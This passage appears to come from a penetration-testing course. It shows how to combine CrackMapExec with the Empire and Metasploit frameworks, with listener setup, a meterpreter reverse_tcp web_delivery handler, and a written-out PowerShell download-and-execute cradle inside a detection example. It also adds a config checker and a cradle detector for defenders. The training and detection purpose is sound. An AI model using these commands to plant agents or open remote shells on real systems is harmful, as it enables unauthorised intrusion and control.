CME can be integrated with C2 Frameworks such as Empire and Metasploit.
Empire
We can use CrackMapExec to send an agent to connect to our Empire server and get a remote connection.
Downloading the Empire Framework
git clone --recursive https://github.com/BC-SECURITY/Empire.git -q
cd Empire
sudo su
curl -sSL https://install.python-poetry.org | python3 -
poetry install
Set up the Empire Server and configuration files
We have to choose an arbitrary username and password for our Empire server.
poetry run python empire.py server --username empireadmin --password HackTheBoxCME!
Changes have to be made in both the CrackMapExec configuration file (~/.cme/cme.conf) and the Empire Client configuration file, and the username, password and port must agree in both. cme.conf is parsed as an INI file, so keep the comments on their own lines: an inline `#` comment after a value would become part of that value.
cme.conf
[Empire]
api_host = 127.0.0.1
api_port = 1337
# Username chosen for the Empire server
username = empireadmin
# Password chosen for the Empire server
password = HackTheBoxCME!
empire/client/config.yaml
localhost:
host: https://localhost
port: 1337
socketport: 5000
username: empireadmin # Username chosen for the Empire server
password: HackTheBoxCME! # Password chosen for the Empire server
autoconnect: true
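Because the two files are maintained by hand, a mismatch between them (a typo in the password, a different port, or an inline INI comment that silently becomes part of the value) is the usual reason the empire_exec module cannot authenticate to the Empire API. The following is an added example, not code from the page, CrackMapExec or Empire: it parses both fragments with the same INI semantics CME relies on, a minimal reader for the flat client YAML, and reports any disagreement. The configuration text is constructed inline from the values above; the "broken" variant reproduces the inline-comment mistake so the check can be seen catching it.

```python
import configparser

# Constructed copy of the cme.conf fragment above, comments on their own lines.
CME_CONF = """[Empire]
api_host = 127.0.0.1
api_port = 1337
# Username chosen for the Empire server
username = empireadmin
# Password chosen for the Empire server
password = HackTheBoxCME!
"""

# Constructed variant with inline comments: configparser (as used by CME) does
# not strip them, so the credential values end up containing the comment text.
BROKEN_CME_CONF = """[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin #Username chosen for the Empire server
password = HackTheBoxCME! #Password chosen for the Empire server
"""

# Constructed copy of the Empire client config.yaml fragment above.
EMPIRE_CLIENT_YAML = """localhost:
  host: https://localhost
  port: 1337
  socketport: 5000
  username: empireadmin # Username chosen for the Empire server
  password: HackTheBoxCME! # Password chosen for the Empire server
  autoconnect: true
"""


def parse_cme_conf(text):
    """Read the [Empire] section exactly as a default ConfigParser would."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    return dict(cp["Empire"])


def parse_empire_client(text, profile="localhost"):
    """Minimal reader for the flat 'profile:\\n  key: value' layout of the client
    config; YAML treats ' #' as a comment, so it is stripped the same way."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.split(" #", 1)[0].rstrip()
        if not line.strip():
            continue
        if not line.startswith(" ") and line.endswith(":"):
            current = line[:-1]          # top-level profile name
            continue
        if current == profile and ":" in line:
            key, value = line.strip().split(":", 1)
            result[key.strip()] = value.strip()
    return result


def check_config_consistency(cme_text, client_text):
    """Return a list of problems; an empty list means the files agree."""
    cme = parse_cme_conf(cme_text)
    client = parse_empire_client(client_text)
    problems = []
    for key in ("username", "password"):
        if "#" in cme.get(key, ""):
            problems.append(f"cme.conf {key} contains '#': inline comment became part of the value")
        if cme.get(key) != client.get(key):
            problems.append(f"{key} differs between cme.conf and the Empire client config")
    if cme.get("api_port") != client.get("port"):
        problems.append("api_port in cme.conf does not match port in the Empire client config")
    return problems


if __name__ == "__main__":
    for label, conf in (("clean", CME_CONF), ("broken", BROKEN_CME_CONF)):
        print(label, check_config_consistency(conf, EMPIRE_CLIENT_YAML) or "OK")
```

Point the two parser calls at the real files (`~/.cme/cme.conf` and `empire/client/config.yaml`) to run the same check against a live setup; the YAML reader is deliberately limited to the flat layout shown above and is not a general YAML parser.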
Connect the Empire Client to the Empire Server and start the listener.
poetry run python empire.py client --config empire/client/config.yaml
We can set an http listener pointing to our attack box IP address on port 8001.
(Empire) > uselistener http
(Empire: uselistener/http) > set Host http://10.129.204.178
(Empire: uselistener/http) > set Port 8001
(Empire: uselistener/http) > execute
Use CME with the module empire_exec.
We can connect an agent to our Empire infrastructure using the CME empire_exec module. The LISTENER option specifies which of the listeners we set up (here the http listener) the agent should call back to.
CME can also help us gain a Metasploit session by combining Metasploit's web_delivery module (as the handler) with the CME web_delivery module.
Start Metasploit and set up the web_delivery handler
use multi/script/web_delivery
set SRVHOST 10.10.14.139
set SRVPORT 8443
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.139
set LPORT 8002
run -j
As we can see in the image below, the payload is served by a web server on port 8443 of our attacker machine (http://10.10.14.139:8443).
Use CME web_delivery
Two options need to be set:
URL -> the URL given by Metasploit where our payload is hosted.
PAYLOAD -> specifies whether our payload is for the x64 or x86 (32-bit) architecture.
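With target 2 selected above, web_delivery hands the target a PowerShell one-liner that downloads the stager from that URL and runs it in memory, so on the defending side the artefact to watch for is that download-and-execute cradle in process-creation telemetry (command-line auditing, Sysmon event 1 or an EDR). The following is an added example, not code from the page or from Metasploit: it scans command-line events for the `net.webclient` / `downloadstring` cradle combined with `IEX`, and records the host and port it fetches from plus whether the window is hidden, which is what an analyst needs to triage the hit. The sample events are constructed; the first is modelled on the generic PowerShell cradle shape, and the stager path is a placeholder.

```python
import re
from urllib.parse import urlsplit

# Constructed sample process-creation command lines (not real telemetry).
# Event 0 follows the generic PowerShell download cradle shape; the rest are
# benign-looking noise that a naive "powershell + http" match would flag.
SAMPLE_EVENTS = [
    "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
    ".downloadstring('http://10.10.14.139:8443/stage'))",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1",
    "powershell.exe -c (new-object net.webclient).downloadfile("
    "'https://updates.example.test/tool.zip','C:\\tmp\\t.zip')",
    "cmd.exe /c dir",
]

# WebClient.DownloadString(<url>) with optional System. prefix and spacing.
CRADLE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient\s*\)?\s*\.downloadstring\("
    r"\s*['\"](?P<url>https?://[^'\"]+)['\"]",
    re.IGNORECASE,
)
# The downloaded text is only dangerous if it is executed in memory.
EXEC = re.compile(r"\bIEX\b|invoke-expression", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
COMMON_PORTS = {80, 443}


def find_download_cradles(events):
    """Return one finding per command line that downloads and executes a script."""
    findings = []
    for cmdline in events:
        match = CRADLE.search(cmdline)
        if not match or not EXEC.search(cmdline):
            continue  # plain downloads (DownloadFile) or no execution: not a cradle
        parts = urlsplit(match.group("url"))
        port = parts.port or (443 if parts.scheme == "https" else 80)
        findings.append({
            "cmdline": cmdline,
            "host": parts.hostname,
            "port": port,
            "nonstandard_port": port not in COMMON_PORTS,
            "hidden_window": bool(HIDDEN.search(cmdline)),
        })
    return findings


if __name__ == "__main__":
    for f in find_download_cradles(SAMPLE_EVENTS):
        print(f"cradle -> {f['host']}:{f['port']} "
              f"nonstandard_port={f['nonstandard_port']} hidden={f['hidden_window']}")
```

The host and port in each finding are what to pivot on next: the same host:port pair will appear in proxy or firewall logs for the stager download and, if the session came up, in the follow-on connection to the LPORT configured in the handler.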